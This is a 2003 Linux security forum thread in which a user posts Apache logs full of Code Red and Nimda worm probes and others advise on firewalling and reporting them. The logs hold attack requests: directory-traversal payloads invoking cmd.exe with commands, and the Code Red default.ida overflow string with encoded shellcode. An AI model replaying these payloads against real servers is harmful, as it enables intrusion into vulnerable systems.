LinuxQuestions.org
Download your favorite Linux distribution at LQ ISO.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 03-12-2003, 07:18 PM   #1
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Rep: Reputation: 15
Help I am UNDER ATTACK...


My first impression is that an infected IIS server is making requests. I nmap'd the machine and it is a Windoze box. My problem, I am on AT&T and they "frown" upon servers. So no help there. I then did a DIG and came up with this URL. http://ns.cgocable.net/default.html I tried the number but it is of course busy. Now this is not the only time, actually it has filled my logs before but I want to know what it is, and more importantly how can I stop it.

Peace,
Ryan

Here is the tail of my apache log....

[Wed Mar 12 00:09:25 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 00:09:25 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:26 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:27 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:27 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:27 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:09:28 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:09:28 2003] [error] [client 24.193.130.183] File does not exist: /apache/technature/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Mar 12 00:32:27 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 00:32:28 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 00:32:30 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 00:32:31 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 00:32:32 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:33 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:35 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:36 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:38 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:40 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:42 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 00:32:46 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 00:32:48 2003] [error] [client 24.200.218.131] File does not exist: /apache/technature/html/scripts/..%2f../winnt/system32/cmd.exe
[Wed Mar 12 01:33:37 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 01:43:19 2003] [error] [client 24.126.232.187] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 02:02:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 02:28:01 2003] [error] [client 24.102.204.168] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 03:03:35 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 03:47:26 2003] [error] [client 24.192.113.10] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 04:18:43 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 04:18:46 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 04:18:47 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 04:18:48 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 04:18:48 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 04:18:48 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 04:18:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 04:18:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 04:18:49 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 04:22:19 2003] [error] [client 24.60.246.31] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 04:27:40 2003] [error] [client 24.237.50.177] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 04:58:19 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 05:27:18 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 07:19:46 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 09:37:01 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:29:40 2003] [error] [client 217.97.54.52] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:45:48 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:56:05 2003] [error] [client 24.161.237.200] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 12:58:38 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 13:02:22 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 13:27:43 2003] [error] [client 24.60.163.223] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 15:23:02 2003] [error] [client 24.60.120.134] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 15:55:32 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 16:17:30 2003] [error] [client 24.60.180.235] File does not exist: /apache/technature/html/default.ida
[Wed Mar 12 16:45:04 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/root.exe
[Wed Mar 12 16:45:13 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/MSADC/root.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/c/winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/msadc/..%5c../..%5c../..%5c/..../..../..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:14 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:15 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:15 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..../winnt/system32/cmd.exe
[Wed Mar 12 16:45:15 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..%5c../winnt/system32/cmd.exe
[Wed Mar 12 16:45:16 2003] [error] [client 24.150.120.173] File does not exist: /apache/technature/html/scripts/..%2f../winnt/system32/cmd.exe
 
Old 03-12-2003, 08:28 PM   #2
m0rl0ck
Member
 
Registered: Nov 2002
Distribution: A totally 133t distro :)
Posts: 358

Rep: Reputation: 31
You could put them in hosts.deny or make an iptables rule to drop packets from them. The nice thing about a dropped packet is that they wouldnt get any notification back that you had gotten their connection attempt. If you drop the packet I dont think it woulld even get to apache.


You could also set up a hotmail account to send you log files (stripped of any identifying info) to root, abuse, webmaster and postmaster etc at the offending domain. I would do this 5 or 10 times daily until I got a response
(kidding)

Actually though they arent going to hurt anything other than taking up log space and a little bandwidth.
 
Old 03-12-2003, 08:57 PM   #3
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
Interestingly enough I can not find any record on the net about these log entries. The one thing that does comfort me is the:

/winnt/system32/cmd.exe

at the end of the requests. It appears to be trying to infect a windows box. This is very interesting.
 
Old 03-12-2003, 09:19 PM   #4
m0rl0ck
Member
 
Registered: Nov 2002
Distribution: A totally 133t distro :)
Posts: 358

Rep: Reputation: 31
Ive got some too:

[[Sat Mar 1 15:25:27 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/MSADC/root.exe
[Sat Mar 1 15:25:30 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/c/winnt/system32/cmd.exe
[Sat Mar 1 15:25:33 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/d/winnt/system32/cmd.exe
[Sat Mar 1 15:25:36 2003] [error] [client 66.215.249.185] File does not exist: /var/www/html/scripts/..%5c../winnt/system32/cmd.exe
[Sat Mar 1 15:25:40 2003] [error] [client 66.215.249.185] File does not exist:
/var/www/html/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Mar 1 15:25:43 2003] [error] [client 66.215.249.185] File does not exist:
/var/www/html/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Sat Mar 1 15:25:49 2003] [error] [client 66.215.249.185] File does not exist:
/var/www/html/msadc/..%5c../..%5c../..%5c/..


Doesnt every httpd server in the universe (except for the MS ones of course) have this stuff in its log files?
Its just the standard code red/nimda stuff isnt it?
 
Old 03-12-2003, 10:22 PM   #5
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Original Poster
Rep: Reputation: 15
It may be, could some we figure out a way to block it, then inform the person that they should check out what is causing it? They might not know this is going on. If it is malicious in intent then what?
 
Old 03-12-2003, 10:47 PM   #6
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
Well it certainly is malicious intent but the thing that is interesting in your case is the directory it is going after. It is very common to see:

File does not exist: /var/www/html/MSADC/root.exe

in your log files. As m0rl0ck said these are just your standard nimda and code red viruses trying to exploit Microsoft IIS servers.

In your case it is looking in:

File does not exist: /apache/technature/html/d/winnt/system32/cmd.exe

I've never seen this before. I wonder why it would be looking in an apache directory on a windows server.
 
Old 03-14-2003, 12:55 PM   #7
tcaptain
LQ Addict
 
Registered: Jul 2002
Location: Montreal
Distribution: Gentoo 2004 from stage 1 baby!
Posts: 1,403

Rep: Reputation: 45
Quote:
Originally posted by Crashed_Again I've never seen this before. I wonder why it would be looking in an apache directory on a windows server.
Could it be an altered version made to target Apache on windows systems?
 
Old 03-14-2003, 01:23 PM   #8
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Original Poster
Rep: Reputation: 15
Still getting slammed by this...

All attempts to contact the ISP that owns the IPs have failed. The phone numbers don't work. It has to be coming from an infected windoze machine. A hacker would not be this careless (IMHO). I am considering putting these IPs in hosts.deny, but that really doesn't solve the problem especially in a DHCP world. Any suggestions on where to go from here are much appreciated.


Here is part of today's log.

24.60.246.31 - - [14/Mar/2003:05:58:34 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
24.60.246.31 - - [14/Mar/2003:05:58:38 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
24.60.246.31 - - [14/Mar/2003:05:58:43 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.60.246.31 - - [14/Mar/2003:05:58:44 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.60.246.31 - - [14/Mar/2003:05:58:55 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.60.246.31 - - [14/Mar/2003:05:58:56 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
24.101.172.221 - - [14/Mar/2003:06:10:30 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.95.173 - - [14/Mar/2003:07:46:54 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
211.124.183.184 - - [14/Mar/2003:08:13:32 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.162.205.223 - - [14/Mar/2003:09:09:03 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.136.158.105 - - [14/Mar/2003:09:19:49 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 280
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 278
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 288
24.136.158.105 - - [14/Mar/2003:09:19:50 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.136.158.105 - - [14/Mar/2003:09:19:51 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
24.136.158.105 - - [14/Mar/2003:09:19:51 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 319
24.136.158.105 - - [14/Mar/2003:09:19:52 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 335
24.136.158.105 - - [14/Mar/2003:09:19:52 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:53 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:54 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:55 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
24.136.158.105 - - [14/Mar/2003:09:19:56 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
24.136.158.105 - - [14/Mar/2003:09:19:56 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 285
24.136.158.105 - - [14/Mar/2003:09:19:57 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.136.158.105 - - [14/Mar/2003:09:19:57 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 302
24.60.120.134 - - [14/Mar/2003:09:51:27 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.120.134 - - [14/Mar/2003:10:06:49 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.120.134 - - [14/Mar/2003:10:12:42 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.60.95.173 - - [14/Mar/2003:10:35:19 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
24.192.228.186 - - [14/Mar/2003:13:28:16 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 275
 
Old 03-14-2003, 03:53 PM   #9
paranoid
LQ Newbie
 
Registered: Mar 2003
Location: Never more than 30 seconds from a keyboard
Distribution: Debian by choice, RH for Work, *BSD on and off
Posts: 13

Rep: Reputation: 0
The phone numbers don't work, but which phone numbers? Have you tried looking up the ISP name in the phone directory and calling the number listed there?

If you firewall it, it'll consume MUCH less bandwidth (not hosts.deny, firewall drop it).

Apart from that, well, it seems to be a machine infected by Nimda/CodeRed and not a subhuman looking for machines to crack into... so... Nimda opens a backdoor on machines it has infected... but that would be illegal (troublesome priest anyone?), so back to your telephone. Traceroute the thing, and identify the netblocks with geektools. Email abuse@ and security@netblock-owner. Make sure you say in the subject line that it's an ongoing DOS from IP xxxxxxx , and say in the body for how long it's been going on, with log extracts, and mention if your system is NTP-synchronized.

Now, I just looked back on your logs, and noticed that there are several IPs involved, not just one Nimda gone mad. Bet you that you're also with AT&T ? Nimda tries adjacent subnets first. That means you have a lot of nimda-infected people in your neighborhood.

Best I can say is grin and bear it, maybe extract logs once in a while, summarize, and send to netblock owner... I was security admin at a braodband ISP when Nimda came out, and we had to cron rotate and zip our logs every hour, otherwise the log partition filled up. We offloaded the logs, extracted the IPs, mailed or called the clients, blacklisted those we didn't get hold of, had to take calls from the ones who got blacklisted... it took us days until we'd even made an attempt at contacting them all, with new ones every hour, and we were in a real privileged position compared to you. Maybe (cough) AT&T don't care as much as we did, so they certainly aren't going to do better.

Last edited by paranoid; 03-15-2003 at 04:32 AM.
 
Old 03-14-2003, 03:54 PM   #10
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Rep: Reputation: 422Reputation: 422Reputation: 422Reputation: 422Reputation: 422
Open mouth, insert foot.....

OK, potentially dumb question here, but that has never stopped me before. In a situation like this, is needamiracles server responding to these probes in any way? If so, does that advertise his location as being a potential target? In other words, if iptables was used to drop the packets, would the problem go away because the other end isn't getting a response?
 
Old 03-14-2003, 05:19 PM   #11
tcaptain
LQ Addict
 
Registered: Jul 2002
Location: Montreal
Distribution: Gentoo 2004 from stage 1 baby!
Posts: 1,403

Rep: Reputation: 45
Quote:
Originally posted by Hangdog42
Open mouth, insert foot.....

OK, potentially dumb question here, but that has never stopped me before. In a situation like this, is needamiracles server responding to these probes in any way? If so, does that advertise his location as being a potential target? In other words, if iptables was used to drop the packets, would the problem go away because the other end isn't getting a response?
The way I understand it, the answer to this is...it depends.

You can set up your firewall to either drop or reject packets...so it can either respond with "bug off" as it were or just ignore...

Anyone with more knowledge is free to contradict me...
 
Old 03-15-2003, 04:31 AM   #12
paranoid
LQ Newbie
 
Registered: Mar 2003
Location: Never more than 30 seconds from a keyboard
Distribution: Debian by choice, RH for Work, *BSD on and off
Posts: 13

Rep: Reputation: 0
Quote:
Originally posted by Hangdog42
Open mouth, insert foot.....

OK, potentially dumb question here, but that has never stopped me before. In a situation like this, is needamiracles server responding to these probes in any way?
Yes sure, it's sending back a tcp ack, to answer the tcp syn, telling Nimda that there is a web server at this address, and nimda then sends a request for the microsoft (very soft) page, server replies "sorry I don't have this page", Nimda tries another page, and so on.

Quote:

If so, does that advertise his location as being a potential target? In other words, if iptables was used to drop the packets, would the problem go away because the other end isn't getting a response?
He'd still get the first probe, from every newly infected machine and from every infected machine that decides to try again, but not all the rest.

As for dropping or rejecting, that's a matter of taste depending on the rest of your firewall config, whether you reply to pings or not, exactly what you want the guy scanning you to think, whether you care about your outgoing bandwith... could try both with Nimda and see what nimda does. Dropping will make nimda wait longer before deciding there was a problem, which is good, but might prompt the damned thing into trying again.
 
Old 03-15-2003, 07:35 AM   #13
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Rep: Reputation: 422Reputation: 422Reputation: 422Reputation: 422Reputation: 422
Thanks paranoid, I appreciate you taking time to answer.
 
Old 03-18-2003, 12:37 PM   #14
needamiracle
Member
 
Registered: Apr 2002
Location: North Attleboro, MA
Distribution: RH 7.3
Posts: 106

Original Poster
Rep: Reputation: 15
Sorry, I have been on vacation for the past couple days.

paranoid - you are correct. I am on AT&T, and they :-( on servers so I don't want to involve them. The phone numbers I have tried have been the WHOIS technical contact. The number at the addy http://ns.cgocable.net/default.html. I tried www.cgocable.ca and got 404s on the support pages.

I have found out through exporting my log files to Windows and using Access (unfortunately I have not found an all around front end DB app on Linux yet...any suggestions appreciated) and have gotten IP counts for each request and type. I have started from the largest offenders and am slowly working my way down the list identifying and informing those I can get in touch with. Thanks for everyones help.
 
Old 03-18-2003, 01:42 PM   #15
Crashed_Again
Senior Member
 
Registered: Dec 2002
Location: Atlantic City, NJ
Distribution: Ubuntu & Arch
Posts: 3,503

Rep: Reputation: 57
Something must be done about these IIS exploits. I'm brainstorming now on writing a daemon that identifys these exploit requests and then drops them at the firewall. I'd also like to have it try to e-mail these infected servers with a nastygram. I'm sick of this crap in my log files. The LIFE(Linux Interceptors For Exploits) daemon.
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
What attack could this be??? darrel Linux - Security 10 02-26-2005 10:10 PM
What to do during an attack? revenant Linux - Security 9 04-02-2004 12:18 AM
hacker attack? zetsui Linux - General 4 08-04-2003 06:03 AM
Sendmail Attack m0rl0ck Linux - Security 4 07-04-2003 04:08 AM
